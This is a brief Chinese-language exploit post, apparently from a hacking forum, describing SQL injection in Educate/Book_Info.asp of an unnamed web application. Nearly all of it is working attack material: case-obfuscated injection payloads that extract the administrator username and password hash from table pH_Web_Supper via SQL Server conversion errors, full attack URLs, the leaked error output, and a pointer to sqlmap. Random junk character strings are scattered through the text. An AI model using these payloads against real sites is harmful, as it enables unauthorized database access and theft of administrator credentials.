漏洞出现在Educate/Book_Info.asp
% Y1 b, P& R' i$ v6 ^8 q
; J* F% x9 q: k" l此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
! T5 n8 ~# G: g2 X! l G' k8 M: v' V
; Q2 j" ~+ F' R, p7 m: ?exp:如下
" D5 t6 \ B2 X+ t查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
. R) f" z4 ^2 I- v- L; |查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper); h7 `; ~3 B' n. U$ J# s5 l
5 S( F- j4 m% q' ?, Chttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)# ]- @! t+ T8 @! C+ Q# v
) c) c% O8 U' v+ C) d+ a0 ~/ t" g( j
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'; n, |, {' z! K! I, z- n' I n* H
6 U; t0 t' ~% a将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
) m0 m' e8 N) ?, z- D: y! n% c $ A& ^" e( Z, Y4 j1 A' R
/Educate/Book_Info.asp,行 8
: n/ M( K0 u( _! p+ r6 G/ C + A6 A9 u$ V# A3 T' B
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
+ U/ Y" V8 U6 E3 t/ o$ y$ k- B 7 U5 n5 f2 h' F( e M. M& C
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
L3 K, |. A* @- Y4 d6 `
( ~" L5 F# Y/ U+ x将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
. h8 N) w: M5 g& N( J
' ] s6 z2 G5 V2 G/Educate/Book_Info.asp,行 8' G6 p1 t3 W9 w+ t
|